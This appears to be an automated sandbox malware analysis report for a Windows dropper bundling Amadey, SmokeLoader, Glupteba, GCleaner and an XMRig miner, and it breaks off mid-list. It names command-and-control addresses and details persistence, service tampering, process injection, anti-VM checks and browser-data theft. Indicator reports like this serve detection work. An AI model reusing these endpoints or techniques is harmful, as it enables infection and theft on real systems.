Analysis
-
max time kernel
151s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230621-en -
resource tags
arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system -
submitted
25/06/2023, 10:27
Static task
static1
General
-
Target
fileexe.exe
-
Size
4.3MB
-
MD5
75736d164f6f4ae0bb6f856d8dc01db4
-
SHA1
a280cc0281045dca631a09978a9132ba9d58a2a8
-
SHA256
5aad31095b0b9a429fed8773a233eb872868467d33f52b9d6f6e7fa078092011
-
SHA512
94ac3b246673394104b368767e73e937068841f5dbcd01462bd710ba06dc10af2b33473fd84e3cbe67301c1db443bfc00907d3ce7b88a78e329014714ccea18c
-
SSDEEP
98304:0Wo3BduYaE+I9noizGfIYVcfa9n06bTpHWOTez/M6bsUn5v:0X3BgHETKHqa9nhpxezhv
Malware Config
Extracted
amadey
3.83
5.42.65.80/8bmeVwqx/index.php
Extracted
gcleaner
45.12.253.56
45.12.253.72
45.12.253.98
45.12.253.75
Extracted
smokeloader
up3
Extracted
smokeloader
2020
http://host-file-host6.com/
http://host-host-file8.com/
Signatures
-
Detect Fabookie payload 2 IoCs
resource yara_rule behavioral2/memory/448-210-0x0000000003600000-0x0000000003731000-memory.dmp family_fabookie behavioral2/memory/448-283-0x0000000003600000-0x0000000003731000-memory.dmp family_fabookie -
Glupteba payload 16 IoCs
resource yara_rule behavioral2/memory/4924-236-0x0000000002F10000-0x00000000037FB000-memory.dmp family_glupteba behavioral2/memory/4924-287-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/4924-293-0x0000000002F10000-0x00000000037FB000-memory.dmp family_glupteba behavioral2/memory/4924-321-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/1020-336-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/1020-383-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/2396-507-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/2396-517-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/2396-528-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/2396-533-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/2396-537-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/2396-607-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/2396-613-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/2396-618-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/2396-624-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/2396-632-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba -
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
description pid Process procid_target PID 1432 created 3184 1432 XandETC.exe 34 PID 1432 created 3184 1432 XandETC.exe 34 PID 1432 created 3184 1432 XandETC.exe 34 PID 1432 created 3184 1432 XandETC.exe 34 PID 1432 created 3184 1432 XandETC.exe 34 PID 628 created 3184 628 updater.exe 34 PID 628 created 3184 628 updater.exe 34 PID 628 created 3184 628 updater.exe 34 PID 628 created 3184 628 updater.exe 34 PID 628 created 3184 628 updater.exe 34 PID 4916 created 3184 4916 conhost.exe 34 PID 628 created 3184 628 updater.exe 34 -
XMRig Miner payload 4 IoCs
resource yara_rule behavioral2/memory/4016-612-0x00007FF639CB0000-0x00007FF63A4A4000-memory.dmp xmrig behavioral2/memory/4016-617-0x00007FF639CB0000-0x00007FF63A4A4000-memory.dmp xmrig behavioral2/memory/4016-623-0x00007FF639CB0000-0x00007FF63A4A4000-memory.dmp xmrig behavioral2/memory/4016-636-0x00007FF639CB0000-0x00007FF63A4A4000-memory.dmp xmrig -
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 3840 netsh.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation fileexe.exe Key value queried \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation oldplayer.exe Key value queried \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation oneetx.exe Key value queried \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation setup.exe -
Executes dropped EXE 20 IoCs
pid Process 448 aafg31.exe 1752 oldplayer.exe 1432 XandETC.exe 2704 oneetx.exe 1460 setup.exe 3840 toolspub2.exe 1832 toolspub2.exe 4924 3eef203fb515bda85f514e168abb5973.exe 4968 oneetx.exe 1020 3eef203fb515bda85f514e168abb5973.exe 2396 csrss.exe 628 updater.exe 2348 injector.exe 3404 windefender.exe 1660 windefender.exe 2200 oneetx.exe 4912 f801950a962ddba14caaa44bf084b55c.exe 3912 oneetx.exe 4260 ugrceei 528 ugrceei -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x0007000000023185-521.dat upx behavioral2/files/0x0007000000023185-523.dat upx behavioral2/files/0x0007000000023185-525.dat upx behavioral2/memory/3404-526-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral2/memory/1660-563-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral2/memory/4016-612-0x00007FF639CB0000-0x00007FF63A4A4000-memory.dmp upx behavioral2/memory/4016-617-0x00007FF639CB0000-0x00007FF63A4A4000-memory.dmp upx behavioral2/memory/1660-620-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral2/memory/4016-623-0x00007FF639CB0000-0x00007FF63A4A4000-memory.dmp upx behavioral2/files/0x000900000002318d-629.dat upx behavioral2/files/0x000900000002318d-630.dat upx behavioral2/memory/1660-633-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral2/memory/4016-636-0x00007FF639CB0000-0x00007FF63A4A4000-memory.dmp upx -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 10 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 3840 set thread context of 1832 3840 toolspub2.exe 108 PID 628 set thread context of 4916 628 updater.exe 213 PID 628 set thread context of 4016 628 updater.exe 219 PID 4260 set thread context of 528 4260 ugrceei 228 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 3eef203fb515bda85f514e168abb5973.exe -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Notepad\Chrome\updater.exe XandETC.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\rss 3eef203fb515bda85f514e168abb5973.exe File created C:\Windows\rss\csrss.exe 3eef203fb515bda85f514e168abb5973.exe File created C:\Windows\windefender.exe csrss.exe -
Launches sc.exe 11 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2692 sc.exe 1760 sc.exe 3884 sc.exe 1120 sc.exe 3088 sc.exe 1584 sc.exe 2828 sc.exe 4788 sc.exe 4332 sc.exe 3892 sc.exe 1708 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 8 IoCs
pid pid_target Process procid_target 1492 1460 WerFault.exe 100 3276 1460 WerFault.exe 100 5024 1460 WerFault.exe 100 3712 1460 WerFault.exe 100 4268 1460 WerFault.exe 100 5052 1460 WerFault.exe 100 1376 1460 WerFault.exe 100 1480 1460 WerFault.exe 100 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ugrceei Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ugrceei Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ugrceei Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2436 schtasks.exe 3040 schtasks.exe 4780 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3164 WMIC.exe -
Kills process with taskkill 3 IoCs
pid Process 3884 taskkill.exe 4484 taskkill.exe 4952 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-41 = "E. South America Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-671 = "AUS Eastern Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2341 = "Haiti Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2411 = "Marquesas Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2572 = "Turks and Caicos Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-672 = "AUS Eastern Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-434 = "Georgian Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-71 = "Newfoundland Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1722 = "Libya Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-632 = "Tokyo Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-52 = "Greenland Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2792 = "Novosibirsk Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1842 = "Russia TZ 4 Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2872 = "Magallanes Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1661 = "Bahia Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-111 = "Eastern Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" 3eef203fb515bda85f514e168abb5973.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1832 toolspub2.exe 1832 toolspub2.exe 5076 powershell.exe 5076 powershell.exe 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3184 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 656 Process not Found -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1832 toolspub2.exe 528 ugrceei -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4484 taskkill.exe Token: SeDebugPrivilege 3884 taskkill.exe Token: SeDebugPrivilege 5076 powershell.exe Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeDebugPrivilege 4952 taskkill.exe Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeDebugPrivilege 4924 3eef203fb515bda85f514e168abb5973.exe Token: SeImpersonatePrivilege 4924 3eef203fb515bda85f514e168abb5973.exe Token: SeDebugPrivilege 4588 powershell.exe Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeDebugPrivilege 2768 powershell.exe Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeDebugPrivilege 4272 powershell.exe Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeDebugPrivilege 4584 powershell.exe Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeDebugPrivilege 5076 powershell.exe Token: SeDebugPrivilege 3776 powershell.exe Token: SeDebugPrivilege 4940 powershell.exe Token: SeShutdownPrivilege 956 powercfg.exe Token: SeCreatePagefilePrivilege 956 powercfg.exe Token: SeShutdownPrivilege 2572 powercfg.exe Token: SeCreatePagefilePrivilege 2572 powercfg.exe Token: SeShutdownPrivilege 2992 powercfg.exe Token: SeCreatePagefilePrivilege 2992 powercfg.exe Token: SeShutdownPrivilege 3612 powercfg.exe Token: SeCreatePagefilePrivilege 3612 powercfg.exe Token: SeIncreaseQuotaPrivilege 4940 powershell.exe Token: SeSecurityPrivilege 4940 powershell.exe Token: SeTakeOwnershipPrivilege 4940 powershell.exe Token: SeLoadDriverPrivilege 4940 powershell.exe Token: SeSystemProfilePrivilege 4940 powershell.exe Token: SeSystemtimePrivilege 4940 powershell.exe Token: SeProfSingleProcessPrivilege 4940 powershell.exe Token: SeIncBasePriorityPrivilege 4940 powershell.exe Token: SeCreatePagefilePrivilege 4940 powershell.exe Token: SeBackupPrivilege 4940 powershell.exe Token: SeRestorePrivilege 4940 powershell.exe Token: SeShutdownPrivilege 4940 powershell.exe Token: SeDebugPrivilege 4940 powershell.exe Token: SeSystemEnvironmentPrivilege 4940 powershell.exe Token: SeRemoteShutdownPrivilege 4940 powershell.exe Token: SeUndockPrivilege 4940 powershell.exe Token: SeManageVolumePrivilege 4940 powershell.exe Token: 33 4940 powershell.exe Token: 34 4940 powershell.exe Token: 35 4940 powershell.exe Token: 36 4940 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1752 oldplayer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3984 wrote to memory of 448 3984 fileexe.exe 86 PID 3984 wrote to memory of 448 3984 fileexe.exe 86 PID 3984 wrote to memory of 1752 3984 fileexe.exe 87 PID 3984 wrote to memory of 1752 3984 fileexe.exe 87 PID 3984 wrote to memory of 1752 3984 fileexe.exe 87 PID 3984 wrote to memory of 1432 3984 fileexe.exe 88 PID 3984 wrote to memory of 1432 3984 fileexe.exe 88 PID 1752 wrote to memory of 2704 1752 oldplayer.exe 89 PID 1752 wrote to memory of 2704 1752 oldplayer.exe 89 PID 1752 wrote to memory of 2704 1752 oldplayer.exe 89 PID 2704 wrote to memory of 2436 2704 oneetx.exe 90 PID 2704 wrote to memory of 2436 2704 oneetx.exe 90 PID 2704 wrote to memory of 2436 2704 oneetx.exe 90 PID 2704 wrote to memory of 4416 2704 oneetx.exe 92 PID 2704 wrote to memory of 4416 2704 oneetx.exe 92 PID 2704 wrote to memory of 4416 2704 oneetx.exe 92 PID 4416 wrote to memory of 2124 4416 cmd.exe 94 PID 4416 wrote to memory of 2124 4416 cmd.exe 94 PID 4416 wrote to memory of 2124 4416 cmd.exe 94 PID 4416 wrote to memory of 4608 4416 cmd.exe 95 PID 4416 wrote to memory of 4608 4416 cmd.exe 95 PID 4416 wrote to memory of 4608 4416 cmd.exe 95 PID 4416 wrote to memory of 4612 4416 cmd.exe 96 PID 4416 wrote to memory of 4612 4416 cmd.exe 96 PID 4416 wrote to memory of 4612 4416 cmd.exe 96 PID 4416 wrote to memory of 4092 4416 cmd.exe 98 PID 4416 wrote to memory of 4092 4416 cmd.exe 98 PID 4416 wrote to memory of 4092 4416 cmd.exe 98 PID 4416 wrote to memory of 4468 4416 cmd.exe 97 PID 4416 wrote to memory of 4468 4416 cmd.exe 97 PID 4416 wrote to memory of 4468 4416 cmd.exe 97 PID 4416 wrote to memory of 2540 4416 cmd.exe 99 PID 4416 wrote to memory of 2540 4416 cmd.exe 99 PID 4416 wrote to memory of 2540 4416 cmd.exe 99 PID 2704 wrote to memory of 1460 2704 oneetx.exe 100 PID 2704 wrote to memory of 1460 2704 oneetx.exe 